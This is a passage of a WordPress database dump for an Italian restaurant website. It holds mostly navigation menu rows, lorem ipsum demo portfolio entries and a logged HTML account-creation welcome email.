17:47:48',' ','','','publish','closed','closed','','3527','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3527/',28,'nav_menu_item','',0),(3528,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3528','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3528/',47,'nav_menu_item','',0),(3529,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3529','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3529/',72,'nav_menu_item','',0),(3530,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3530','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3530/',91,'nav_menu_item','',0),(3531,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3531','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',0,'https://www.ristorantesolymar.it/2020/12/06/3531/',23,'nav_menu_item','',0),(2936,1,'2018-09-17 10:58:38','2018-09-17 10:58:38','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Ice Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','ice-dream-2','','','2018-09-17 10:58:38','2018-09-17 10:58:38','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2936',0,'portfolio-item','',0),(3538,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3538','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3538/',82,'nav_menu_item','',0),(3539,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3539','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3539/',38,'nav_menu_item','',0),(3540,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3540','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3540/',75,'nav_menu_item','',0),(3541,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3541','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3541/',31,'nav_menu_item','',0),(3542,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3542','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3542/',5,'nav_menu_item','',0),(3543,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3543','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3543/',3,'nav_menu_item','',0),(3544,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3544','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3544/',92,'nav_menu_item','',0),(3545,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3545','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3545/',99,'nav_menu_item','',0),(3546,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3546','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3546/',48,'nav_menu_item','',0),(3547,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3547','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3547/',55,'nav_menu_item','',0),(3548,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3548','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3548/',7,'nav_menu_item','',0),(3549,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3549','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3549/',10,'nav_menu_item','',0),(3550,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3550','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3550/',8,'nav_menu_item','',0),(3551,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3551','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3551/',9,'nav_menu_item','',0),(3552,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3552','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3061,'https://www.ristorantesolymar.it/2020/12/06/3552/',12,'nav_menu_item','',0),(3553,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3553','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3061,'https://www.ristorantesolymar.it/2020/12/06/3553/',13,'nav_menu_item','',0),(3554,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3554','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3061,'https://www.ristorantesolymar.it/2020/12/06/3554/',14,'nav_menu_item','',0),(3555,1,'2020-12-06 18:47:49','2020-12-06 17:47:49','','Standard List','','publish','closed','closed','','standard-list-3','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/standard-list-3/',16,'nav_menu_item','',0),(2931,1,'2018-09-17 10:58:11','2018-09-17 10:58:11','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','salad-2','','','2018-09-17 10:58:11','2018-09-17 10:58:11','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2931',0,'portfolio-item','',0),(3981,0,'2021-01-21 21:37:52','2021-01-21 20:37:52','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi yxyzxxfsdvx,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>yxyzxxfsdvx</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','','private','closed','closed','','your-sol-y-mar-account-has-been-created-9','','','2021-01-21 21:37:52','2021-01-21 20:37:52','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-9/',0,'postman_sent_mail','',0),(3560,1,'2020-12-06 18:47:49','2020-12-06 17:47:49','','Standard List','','publish','closed','closed','','standard-list-4','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/standard-list-4/',12,'nav_menu_item','',0),(3561,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3561','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3561/',7,'nav_menu_item','',0),(3562,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3562','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3562/',8,'nav_menu_item','',0),(3563,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3563','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3563/',9,'nav_menu_item','',0),(3564,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3564','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',0,'https://www.ristorantesolymar.it/2020/12/06/3564/',10,'nav_menu_item','',0),(3565,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3565','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3565/',46,'nav_menu_item','',0),(3566,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3566','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3566/',45,'nav_menu_item','',0),(3567,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3567','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3567/',90,'nav_menu_item','',0),(3568,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3568','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3568/',89,'nav_menu_item','',0),(3569,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3569','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3569/',56,'nav_menu_item','',0),(3570,1,'2020-12-06 18:47:49','2020-12-06 17:47:49',' ','','','publish','closed','closed','','3570','','','2020-12-06 18:47:49','2020-12-06 17:47:49','',3039,'https://www.ristorantesolymar.it/2020/12/06/3570/',100,'nav_menu_item','',0),(3571,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3571','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3571/',83,'nav_menu_item','',0),(3572,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3572','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3572/',39,'nav_menu_item','',0),(3573,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3573','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3573/',12,'nav_menu_item','',0),(3574,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3574','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3574/',18,'nav_menu_item','',0),(3575,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3575','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3575/',21,'nav_menu_item','',0),(3576,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3576','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3576/',16,'nav_menu_item','',0),(3577,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3577','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3577/',14,'nav_menu_item','',0),(3578,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3578','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3578/',17,'nav_menu_item','',0),(3579,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3579','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3579/',20,'nav_menu_item','',0),(3580,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3580','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3580/',19,'nav_menu_item','',0),(3581,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3581','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3581/',15,'nav_menu_item','',0),(3582,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3582','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3582/',93,'nav_menu_item','',0),(3583,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3583','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3583/',49,'nav_menu_item','',0),(3584,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3584','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3584/',57,'nav_menu_item','',0),(3585,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3585','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3585/',101,'nav_menu_item','',0),(3586,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3586','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3586/',76,'nav_menu_item','',0),(3587,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3587','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3587/',32,'nav_menu_item','',0),(3588,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3588','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3588/',14,'nav_menu_item','',0),(3595,1,'2020-12-06 18:47:50','2020-12-06 17:47:50','','Small Slider','','publish','closed','closed','','small-slider-3','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/small-slider-3/',66,'nav_menu_item','',0),(3596,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3596','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/3596/',4,'nav_menu_item','',0),(3597,1,'2020-12-06 18:47:50','2020-12-06 17:47:50','','Big Images','','publish','closed','closed','','big-images-4','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/big-images-4/',40,'nav_menu_item','',0),(3598,1,'2020-12-06 18:47:50','2020-12-06 17:47:50','','Small Images','','publish','closed','closed','','small-images-4','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/small-images-4/',41,'nav_menu_item','',0),(3599,1,'2020-12-06 18:47:50','2020-12-06 17:47:50','','Big Slider','','publish','closed','closed','','big-slider-4','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/big-slider-4/',42,'nav_menu_item','',0),(3600,1,'2020-12-06 18:47:50','2020-12-06 17:47:50','','Small Slider','','publish','closed','closed','','small-slider-4','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/small-slider-4/',43,'nav_menu_item','',0),(3601,1,'2020-12-06 18:47:50','2020-12-06 17:47:50','','Big Gallery','','publish','closed','closed','','big-gallery-4','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',0,'https://www.ristorantesolymar.it/2020/12/06/big-gallery-4/',44,'nav_menu_item','',0),(3602,1,'2020-12-06 18:47:50','2020-12-06 17:47:50',' ','','','publish','closed','closed','','3602','','','2020-12-06 18:47:50','2020-12-06 17:47:50','',3039,'https://www.ristorantesolymar.it/2020/12/06/3602/',50,'nav_menu_item','',0),(3603,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3603','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3603/',94,'nav_menu_item','',0),(3604,1,'2020-12-06 18:47:51','2020-12-06 17:47:51','','Single Types','','publish','closed','closed','','single-types-6','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',0,'https://www.ristorantesolymar.it/2020/12/06/single-types-6/',24,'nav_menu_item','',0),(3605,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3605','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',0,'https://www.ristorantesolymar.it/2020/12/06/3605/',16,'nav_menu_item','',0),(3606,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3606','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',0,'https://www.ristorantesolymar.it/2020/12/06/3606/',15,'nav_menu_item','',0),(3607,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3607','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',0,'https://www.ristorantesolymar.it/2020/12/06/3607/',25,'nav_menu_item','',0),(3608,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3608','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',0,'https://www.ristorantesolymar.it/2020/12/06/3608/',24,'nav_menu_item','',0),(3609,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3609','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3609/',48,'nav_menu_item','',0),(3610,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3610','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3610/',25,'nav_menu_item','',0),(3611,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3611','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3611/',23,'nav_menu_item','',0),(3612,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3612','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3612/',51,'nav_menu_item','',0),(3613,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3613','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3613/',50,'nav_menu_item','',0),(3614,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3614','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3614/',53,'nav_menu_item','',0),(3615,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3615','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3615/',52,'nav_menu_item','',0),(3616,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3616','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3616/',29,'nav_menu_item','',0),(3617,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3617','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3617/',28,'nav_menu_item','',0),(3618,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3618','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3618/',27,'nav_menu_item','',0),(3619,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3619','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3619/',30,'nav_menu_item','',0),(3620,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3620','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3620/',37,'nav_menu_item','',0),(3621,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3621','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3621/',60,'nav_menu_item','',0),(3622,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3622','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3622/',77,'nav_menu_item','',0),(3623,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3623','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3623/',33,'nav_menu_item','',0),(3624,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3624','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3624/',40,'nav_menu_item','',0),(3625,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3625','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3625/',41,'nav_menu_item','',0),(3626,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3626','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3626/',84,'nav_menu_item','',0),(3627,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3627','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3039,'https://www.ristorantesolymar.it/2020/12/06/3627/',85,'nav_menu_item','',0),(3628,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3628','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3628/',47,'nav_menu_item','',0),(3629,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3629','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3629/',46,'nav_menu_item','',0),(3630,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3630','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3630/',22,'nav_menu_item','',0),(3631,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3631','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3631/',21,'nav_menu_item','',0),(3632,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3632','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3632/',24,'nav_menu_item','',0),(3633,1,'2020-12-06 18:47:51','2020-12-06 17:47:51',' ','','','publish','closed','closed','','3633','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/3633/',23,'nav_menu_item','',0),(3634,1,'2020-12-06 18:47:51','2020-12-06 17:47:51','','Three Columns','','publish','closed','closed','','three-columns-4','','','2020-12-06 18:47:51','2020-12-06 17:47:51','',3061,'https://www.ristorantesolymar.it/2020/12/06/three-columns-4/',32,'nav_menu_item','',0),(3635,1,'2020-12-06 18:47:52','2020-12-06 17:47:52','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-4','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/four-columns-wide-4/',34,'nav_menu_item','',0),(3636,1,'2020-12-06 18:47:52','2020-12-06 17:47:52','','Four Columns','','publish','closed','closed','','four-columns-4','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/four-columns-4/',33,'nav_menu_item','',0),(3637,1,'2020-12-06 18:47:52','2020-12-06 17:47:52',' ','','','publish','closed','closed','','3637','','','2020-12-06 18:47:52','2020-12-06 17:47:52','',3061,'https://www.ristorantesolymar.it/2020/12/06/3637/',61,'nav_menu_item','',0),(3638,1,'2020-12-06 